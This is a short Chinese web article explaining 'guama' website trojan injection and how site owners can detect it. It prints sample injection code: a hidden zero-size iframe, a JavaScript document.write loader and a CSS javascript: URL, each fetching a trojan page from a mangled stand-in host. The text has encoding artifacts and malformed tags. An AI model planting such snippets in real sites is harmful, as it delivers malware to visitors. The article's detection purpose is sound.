掛馬

時間：2023-06-15 22:33:01 | 來源：營銷百科

時間：2023-06-15 22:33:01 來源：營銷百科

掛馬：其實我們說的所謂的掛馬一般就是在那些可編輯文件下或是頭部加入一段代碼來實現(xiàn)跳轉(zhuǎn)到別的網(wǎng)站訪問那個他們指定的HTML網(wǎng)頁木馬的然后通過你電腦本身的漏洞攻破你的系統(tǒng)給你下載一個下載者，然后那下載者設(shè)定多少時間后開始在指定地點隱藏下載木馬并運行！所以說我們只要把那段代碼給清理掉了就達到了清理掛馬的作用了！所以我們首先要辨別是不是自己的站是不是被掛馬！你如果打開網(wǎng)站發(fā)現(xiàn)很卡但是殺毒軟件沒報警別以為沒事了，很多馬很有可能做了免殺處理所以殺軟沒反映！我們打開網(wǎng)站點查看源代碼如果頂部或是底下出現(xiàn)了這樣的代碼就恭喜你中標(biāo)了！比如：

iframe src=http://localhost/azltj/http: //www.baidu/muma.html width=0 height=0/iframe

我想學(xué)做站的人都知道這行代碼的意思吧？就是插入一個長和高都是0框架運行

http: //www.baidu/muma.html這個頁面！但是因為框架的長和高都是零你就沒辦法看到那個窗口了！但是如果你沒在頂部和底部發(fā)現(xiàn)這些代碼就以為沒事了，有的人還會在中間插入，只是在底部和頂部絕對不會影響到網(wǎng)站的整體結(jié)構(gòu)不用想那么多！但是如果那個掛馬的哥們稍微耐心一點多測試一下在網(wǎng)站代碼的中間還是很容易的！所以如果你代碼太多嫌找著麻煩的話你就可以直接在IE瀏覽器里點查看--隱私里看到底有沒有外連到別的站上去的站！有的話那很有可能被掛馬了?。≒S：如果你的站采集了的別人的圖片的話在隱私里會有連到別人那的哦，或是統(tǒng)計代碼也是，所以這要自己分析，哪些是正常的，哪些不是）！有的童鞋可能會說你這人真笨怎么不知道在源文件里直接查找iframe這個呢！這樣快多了，但是我想說的是不是所有人都是用插入框架的方法掛馬的，方法可是有很多的哦，我就給大家列舉一下比如：

1 、js文件掛馬

首先將以下代碼

document.write('iframe width='0' height='0'

src='http://localhost/azltj/http //www.baidu/muma.htm'/iframe');

保存為xxx.js，

則JS掛馬代碼為

script language=javascript src=http://localhost/azltj/xxx.js/script

2、css中掛馬

body {

background-image: url('javascript:document.write('script

src=http://localhost/azltj/http: //www.baidu/muma.js/script')')}